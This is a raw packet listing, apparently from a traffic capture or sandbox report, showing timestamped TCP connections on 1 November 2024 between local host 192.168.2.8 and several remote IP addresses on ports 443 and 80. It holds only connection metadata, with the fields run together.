                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.894701958 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.894721031 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.894757986 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.894768953 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.894793034 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.894809008 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.895194054 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.895210028 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.895245075 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.895255089 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.895281076 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.895301104 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.895344973 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.895534992 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.895555019 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.895597935 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.895610094 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.895622015 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.895642996 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.895648956 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.895674944 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.895684958 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.895699978 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.895749092 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.896049976 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.896445036 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.896461964 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.896522999 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.896534920 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.896573067 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.896723986 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.009308100 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.009330034 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.009352922 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.009471893 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.009489059 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.009558916 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.009566069 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.009604931 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.009861946 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.009877920 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.009927034 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.009933949 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.009972095 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.010243893 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.010272980 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.010299921 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.010308027 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.010329008 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.010349035 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.010519028 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.010535955 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.010585070 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.010592937 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.010629892 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.010862112 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.010878086 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.010932922 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.010941982 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.010979891 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.011203051 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.011253119 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.011272907 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.011281967 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.011303902 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.011326075 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.011720896 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.011740923 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.011787891 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.011795044 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.011817932 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.011837006 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.012080908 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.012095928 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.012137890 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.012145042 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.012167931 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.012188911 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.012363911 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.012394905 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.012417078 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.012423992 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.012453079 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.012468100 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.046235085 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.046256065 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.046420097 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.046431065 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.046520948 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.126055002 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.126071930 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.126122952 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.126136065 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.126178026 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.126394987 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.126410961 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.126461029 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.126477003 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.126514912 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.126705885 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.126723051 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.126770973 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.126780033 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.126820087 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.127070904 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.127093077 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.127130985 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.127137899 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.127159119 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.127177954 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.127435923 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.127454042 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.127506018 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.127512932 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.127558947 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.127846956 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.127863884 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.127918959 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.127926111 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.127966881 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.161643028 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.161694050 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.161739111 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.161771059 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.161789894 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.161815882 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.235069036 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.235136032 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.235248089 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.235276937 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.235292912 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.235310078 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.235330105 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.235367060 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.235389948 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.235424995 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.235471964 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.235553980 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.235647917 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.235693932 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.235716105 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.235724926 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.235750914 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.235770941 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.236594915 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.236676931 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.236697912 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.250793934 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.250802040 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.250828981 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.250850916 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.250993967 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.251043081 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.251061916 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.251069069 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.251092911 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.251118898 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.251265049 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.251332998 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.251384020 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.251447916 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.251482964 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.251528978 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.251538992 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.251554966 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.251584053 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.251616955 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.281183004 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.281205893 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.281321049 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.281337023 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.281440020 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.350013018 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.350069046 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.350173950 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.350193977 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.350208998 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.350234985 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.350302935 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.350344896 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.350369930 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.350378990 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.350399017 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.350420952 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.350492001 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.350542068 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.350572109 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.350580931 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.350608110 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.350626945 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.351885080 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.351933002 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.351968050 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.351975918 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.352000952 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.352022886 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.353055000 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.353153944 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.353157997 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.353188038 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.353225946 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.353240013 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.353950977 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.353995085 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:18.354039907 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:26.824127913 CET4971180192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:26.829021931 CET804971144.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:26.829674006 CET4971180192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:26.829791069 CET4971180192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:26.829807043 CET4971180192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:26.835139036 CET804971144.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:26.835151911 CET804971144.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:27.267967939 CET4971280192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:27.272825003 CET804971254.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:27.272881985 CET4971280192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:27.273194075 CET4971280192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:27.273282051 CET4971280192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:27.277966022 CET804971254.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:27.278083086 CET804971254.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:28.113450050 CET804971254.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:28.114844084 CET4971280192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:28.120987892 CET804971254.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:28.121037960 CET4971280192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:28.526943922 CET804971144.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:28.527168989 CET4971180192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:28.532788992 CET804971144.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:28.532943010 CET4971180192.168.2.844.221.84.105
